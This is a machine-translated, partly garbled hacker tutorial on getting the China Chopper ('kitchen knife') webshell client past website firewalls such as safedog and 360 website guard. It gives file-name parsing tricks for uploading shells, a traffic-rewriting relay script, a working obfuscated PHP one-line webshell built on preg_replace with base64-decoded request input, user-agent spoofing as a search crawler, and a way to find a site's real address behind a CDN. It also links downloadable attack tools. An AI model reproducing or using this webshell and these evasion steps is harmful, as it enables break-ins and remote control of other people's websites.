Bypassing various guard to intercept the connection with the kitchen knife

In recent years, a variety of free website security protection products have been surging. Even for the single-host version, even for safedog, more security products are available online, such as 360 website guard and yundun, DNSPOD is integrated into the baby, and many hackers cannot connect to the kitchen knife, so various methods have come out. I have read some articles over the past few days and made some preparations. First, various semicolons/;.shell.asp;.jpg/; 1.asp/ 1.jpg new versions do not know whether to intercept; the semicolon position is very important, as if the semicolon is placed before/, the success rate is high. When the connection fails, encode; % 3B. Second, the ghost Brother's transfer was originally to replace and modify the content submitted by the kitchen knife in this transfer file, and then the various dogs will not intercept it. Click to download this file http://up.2cto.com/2013/0819/20130819104424266.rar Usage written by ghost Brother: Usage: first put this script into a directory of executable. asp and then access http://www.xx.com/asf.asp?dz= Enter the webshell address you want and enter the address into the kitchen knife password or the webshell password you want to use. Also, select the suffix type of the one-sentence Trojan, for example: http://www.xx.com/asf.asp?dz= Http://xxx.com/yijuhua.php password this script is currently supported. php. aspx one-sentence connection. asp may not be able to test the third type. From the second type, we can see that the keyword can be replaced by a dog, so it is okay to start with the kitchen knife directly, as can be seen from the code above, it is mainly to scan and kill eval and post, so Sao sum and fallen leaves come up with a way, 0D load nop to drop these two keywords. Next sentence: <? Php preg_replace ("/^/e", base64_decode ($ _ REQUEST [g]), 0);?> Kitchen Knife connection, password left blank http://192.168.100.193/s.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ== Ciphertext decoding is the eval (base64_decode ($ _ REQUEST [z0]), which is an evil/e modifier. Here, base64 encryption is performed twice. The ciphertext is transmitted for the first time. After decoding, the server continues to execute the command ciphertext submitted by the chopper. That is, z0 content. Fourth, camouflage crawlers. Generally, waf must open crawlers. Otherwise, no website is included. Therefore, modify the user-agent to disguise the spider. Start with the kitchen knife. In the article we see, we load the file with OD, and then find Firefox to get: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) after Firefox/3.5.0, c32 is changed: mozilla/5.0 + (compatible; + Baiduspider/2.0; ++ http://www.baidu.com/search/spider.html ) I also tested it. Firefox is not found, but windows does. My kitchen knife is XXOO after mozilla/4.0 (compatible; msie 6.0; windows nt 5.1. The fifth type is disguised as user-agent. blacksplit cleverly uses the method of setting up a local proxy to disguise user-agent. First, set up a proxy. After ie is set, the Internet Explorer traffic will pass through this port. Specify the domain name, that is, only modifying the user-agent on the target site reduces the workload. If you change get to post, it seems that you have created waf. Thanks to the help of this tool, if you have to give some comments, you can customize and replace keywords such as eval and post, which is more perfect. Click to download this file: http://up.2cto.com/2013/0819/20130819104613901.rar The sixth method is to modify the USER-AGENT and firefox. https://addons.mozilla.org/zh-cn/firefox/addon/user-agent-switcher/ After installation, you can switch between them at any time. A powerful user-agent file is provided. http://up.2cto.com/2013/0819/20130819104712560.rar Seventh, the last time I got a website, I joined the 360 website guard. After a sentence, I couldn't connect to it for a long time. It took me a long time to understand it and cdn. Go directly to dog kitchen knife XXX and get the real address. modify the original address of the System host www.target.com. It is very important to hide the real address. Otherwise, add "360", and the security Bao is also white blind. Daokers2013.8.18